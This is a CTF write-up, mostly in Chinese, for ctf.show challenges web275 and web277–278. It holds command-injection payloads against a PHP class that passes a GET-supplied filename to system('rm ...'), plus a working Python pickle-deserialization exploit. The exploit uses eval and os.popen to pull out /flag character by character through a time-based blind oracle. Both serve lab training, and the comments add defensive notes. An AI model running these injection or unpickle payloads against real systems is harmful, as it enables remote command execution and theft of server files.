web275
这道题和序列化一点关系都没有：整个代码并没有说明 filename（$f）怎么传参，只有 fn 一个 GET 参数，并且对内容里的 flag 做了屏蔽。
highlight_file(__FILE__);
/**
 * filter: wraps an upload (name + content) and decides whether it is "evil".
 *
 * Security-relevant points a reviewer would flag:
 *  - __destruct() runs `system('rm ' . $this->filename)` with the filename taken
 *    verbatim from $_GET['fn'] — a shell command built from request input.
 *    unlink($this->filename) would delete the file without involving a shell.
 *  - The name check (/php|\.\./i) is a denylist that only *marks* the object as
 *    evil; it does not stop the object from being constructed, so the destructor
 *    still fires with the untrusted name.
 */
class filter{
    public $filename;
    public $filecontent;
    public $evilfile=false;

    // $f is the file name, $fn is the file CONTENT (note the easily confused
    // parameter names; the caller below passes $_GET['fn'] as $f).
    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }

    // Marks the object evil when the name contains "php" or "..", or the
    // content contains "flag". Returns the resulting flag (bool).
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){
            $this->evilfile=true;
        }
        return $this->evilfile;
    }

    // Command-injection sink: $this->filename is interpolated unquoted into a
    // shell command line. Mitigation: unlink() the path, or at minimum
    // escapeshellarg() it, and validate the name against an allowlist.
    public function __destruct(){
        if($this->evilfile){
            system('rm '.$this->filename);
        }
    }
}
// Request handling: fn is the file name, the raw POST body is the content.
if(isset($_GET['fn'])){
    $content = file_get_contents('php://input');
    $f = new filter($_GET['fn'],$content);
    // Only a "clean" upload is written; an "evil" one is left to the destructor.
    if($f->checkevil()===false){
        file_put_contents($_GET['fn'], $content);
        copy($_GET['fn'],md5(mt_rand()).'.txt');
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);
        echo 'work done';
    }
}else{
    echo 'where is flag?';
}
$content = file_get_contents('php://input')
$f = new filter($_GET['fn'],$content);
GET :
?fn=php;ls
?fn=php;tac flag.php
这里其实可以理解为：我传的 fn 是文件名，文件内容 $content 就是从输入流得到的内容，也就是 `;` 后面的内容。但作者这里用了两个 fn 来混淆：filter 构造函数里的 $fn 是文件内容，而外面 GET 参数的 fn 是文件名。
$this->filename=$f;
$this->filecontent=$fn;
web277–web278
python序列化,EXP
import requests
import time
import string
import pickle
import base64
# Blind, time-based flag extraction via an unpickle sink.
#
# What the script relies on (from the code below): the /backdoor endpoint
# presumably pickle.loads() the base64 `data` parameter, so an object whose
# __reduce__ returns (eval, (code,)) executes `code` on the server. Each request
# tests one character of /flag; a match sleeps 3 s, which exceeds the 2.5 s read
# timeout and is observed as an exception on the client.
#
# Defensive takeaway: never deserialize pickle from untrusted input — use JSON
# or authenticate the blob (e.g. HMAC) before loading. Server-side, this
# oracle shows up as a burst of requests to one endpoint with ~3 s latency.
result=""
# Candidate alphabet: "_-{}", upper/lower-case letters and digits.
# NOTE: this shadows the builtin `str`; bytes.decode below still works because
# it is called through the `bytes` type, not through `str`.
str="_-{}"+string.ascii_letters+string.digits
url="http://e8eaffdd-233c-4c5d-82d0-79a89a515df3.challenge.ctf.show/backdoor?data="
# {0} = 1-based character position, {1} = candidate character.
payload="__import__('os').popen('if [ `cat /flag|cut -c {0}` == {1} ];then sleep 3;fi').read()"
class Rce():
    """Pickle gadget: unpickling an instance evaluates self.code via eval."""
    def __init__(self,payload):
        self.code=payload
    def __reduce__(self):
        # print(self.code)
        return (eval,(self.code,))
length=50  # maximum number of flag positions to probe
key=0  # manual stop switch (only set by the commented-out code below)
for j in range(1,length):
    if key==1:
        break
    for n in str:
        # Serialize the gadget and base64-encode it for the query string.
        rser = bytes.decode(base64.b64encode(pickle.dumps(Rce(payload.format(j,n)))))
        target=url+rser
        # print(target)
        try:
            requests.get(target,timeout=(2.5,2.5))
        except:
            # A timeout means the server slept -> this character matched.
            # Bare except: any other network error is also counted as a hit.
            result=result+n
            print(result)
            break
        # if n=='9':
        #     key=1